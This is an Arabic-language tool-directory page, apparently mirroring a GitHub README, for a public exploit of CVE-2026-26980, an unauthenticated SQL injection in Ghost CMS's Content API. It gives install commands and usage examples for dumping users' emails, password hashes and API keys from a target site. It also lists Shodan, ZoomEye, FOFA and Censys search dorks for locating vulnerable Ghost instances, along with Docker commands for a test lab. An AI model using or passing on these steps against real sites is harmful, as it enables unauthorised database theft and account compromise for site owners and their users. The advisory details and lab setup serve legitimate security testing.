Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-26980 — استغلال حقن SQL غير مصادق عليه لواجهة Ghost CMS Content API (CVE-2026-26980)؛ يقوم بتفريغ جداول قاعدة البيانات من SQLite/MySQL مع فحوصات نشطة/سلبية وتصدير CSV. | Kitploit
أدوات/GitHubGitHub/vognik/cve-2026-26980
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتأمن الويباختبار الاختراقأمن قواعد البيانات
GitHubvognik/cve-2026-26980

CVE-2026-26980

استغلال حقن SQL غير مصادق عليه لواجهة Ghost CMS Content API (CVE-2026-26980)؛ يقوم بتفريغ جداول قاعدة البيانات من SQLite/MySQL مع فحوصات نشطة/سلبية وتصدير CSV.

عرض المستودع
102منذ 4 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-26980 — 👻 ثغرة SQLi غير مصادق عليها في Ghost CMS عبر Content API

كانت توجد ثغرة حقن SQL في واجهة Content API الخاصة بـ Ghost تسمح للمهاجمين غير المصادق عليهم بقراءة بيانات عشوائية من قاعدة البيانات.

CVECVE-2026-26980
CVSS9.4 (حرجة)
المتأثرGhost >= 3.24.0, <= 6.19.0
الإصلاح6.19.1
تاريخ الكشف2026-02-20
الفضلNicholas Carlini
استغلال عامvognik
النوعSQLi غير مصادق عليه عبر Content API → قراءة عشوائية من قاعدة البيانات

التثبيت

root@kitploit:~
git clone https://github.com/vognik/CVE-2026-26980.git
cd CVE-2026-26980
pip install -r ./requirements.txt

كيفية الاستخدام

root@kitploit:~
usage: main.py [-h] -u URL [-a KEY] [-p PATH] [-k] [-c MODE] [-d {sqlite,mysql}] [-T NAME] [-C COL1,COL2] [-t N] [-o FILE]

options:
  -h, --help            show this help message and exit

Connection settings:
  -u, --url URL         Set target Ghost instance URL
  -a, --api-key KEY     Set Content API key (skips auto-discovery)
  -p, --api-path PATH   Set Content API path (default: /ghost/api/content/)
  -k, --insecure        Skip SSL certificate verification

Extraction settings:
  -c, --check MODE      Verify vulnerability: passive (meta tags) or active (SQL error)
  -d, --dbms {sqlite,mysql}
                        Select database engine (default: sqlite)
  -T, --table NAME      Set database table to dump (e.g., users, api_keys)
  -C, --columns COL1,COL2
                        Set columns to extract (comma-separated)
  -t, --threads N       Set number of concurrent threads (default: 15)

Output settings:
  -o, --output FILE     Save results to the specified CSV file

Usage examples:
python3 main.py -u http://target.com
(Quickly extract admin email and password hash from a default SQLite setup)

python3 main.py -u http://target.com -c passive
(Check the site for the vulnerability using the meta tag on the main page)

python3 main.py -u http://target.com -d mysql -T users -C email,password -o ./result.csv
(Dump the "email" and "password" columns from the "users" table and save the result to "result.csv")

python3 main.py -u http://target.com -d mysql -T api_keys -t 25
(Dump all API keys from the "api_keys" table using 25 threads)

Note: Most production Ghost instances use MySQL. Local/Small blogs use SQLite.

عرض توضيحي

عرض توضيحي

Dorks

صورة
Shodanhttp.html:"data-ghost="

إعداد المختبر

sqlite

root@kitploit:~
docker run -p 8080:2368 -e database__client=sqlite3 -e database__connection__filename=/var/lib/ghost/content/data/ghost.db -e url=http://localhost:2368 -e port=2368 ghost:6.16.1

mysql

root@kitploit:~
cd lab
docker compose up

البحث الأصلي

Nicholas Carlini - Black-hat LLMs | [un]prompted 2026

Watch

📄 الرخصة

هذا المشروع مرخّص بموجب رخصة GPL-3.0.
راجع ملف LICENSE للتفاصيل.

تنزيل الأداة
Zoomeyehttp.body="data-ghost="
Fofabody="data-ghost="
Censysweb.software.vendor = "ghost"